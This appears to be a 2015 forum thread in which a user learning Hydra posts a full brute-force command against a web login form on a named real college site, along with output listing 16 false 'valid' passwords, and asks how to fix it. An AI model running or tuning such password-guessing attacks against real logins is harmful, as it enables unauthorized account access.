Wonder How ToGadget HacksNext RealityNull Byte
Forum Thread

Problem with Bruteforce Using Hydra

Nov 7, 2015 12:36 PM
Nov 7, 2015 02:20 PM

Hi all,

I started to learn using hydra recently and tried to brute force some web base login form which i already have access to,but after running the required command of hydra which is as follows..

hydra -l myusernae -P passwords www.bvrit.edu.in http-get-form "/default.aspx:txtId2=^USER^&txtPwd2=^PASS^:Invalid password !"

But hydra is returning all the first 15-16 passwords in the list as vaid passwords what i get after exicuting the above is

Hydra (http://www.thc.org/thc-hydra) starting at 2015-11-07 17:53:46

DATA max 16 tasks per 1 server, overall 64 tasks, 497 login tries (l:1/p:497), ~0 tries per task

DATA attacking service http-get-form on port 80

80http-get-form host: www.bvrit.edu.in login: myUsername password: prince

80http-get-form host: www.bvrit.edu.in login: myUsername password: beach

80http-get-form host: www.bvrit.edu.in login: myUsername password: porsche

80http-get-form host: www.bvrit.edu.in login: myUsername password: amateur

80http-get-form host: www.bvrit.edu.in login: myUsername password: united

80http-get-form host: www.bvrit.edu.in login: myUsername password: chelsea

80http-get-form host: www.bvrit.edu.in login: myUsername password: 12345678

80http-get-form host: www.bvrit.edu.in login: myUsername password: 7777777

80http-get-form host: www.bvrit.edu.in login: myUsername password: cool

80http-get-form host: www.bvrit.edu.in login: myUsername password: guitar

80http-get-form host: www.bvrit.edu.in login: myUsername password: great

80http-get-form host: www.bvrit.edu.in login: myUsername password: jaguar

80http-get-form host: www.bvrit.edu.in login: myUsername password: rosebud

80http-get-form host: www.bvrit.edu.in login: myUsername password: password

80http-get-form host: www.bvrit.edu.in login: myUsername password: butter

80http-get-form host: www.bvrit.edu.in login: myUsername password: firebird

1 of 1 target successfully completed, 16 valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2015-11-07 17:53:51__

whts is wrong with the code what are the modification should be made like using cookies etc any brief suggestion or explanation please...

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)
636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!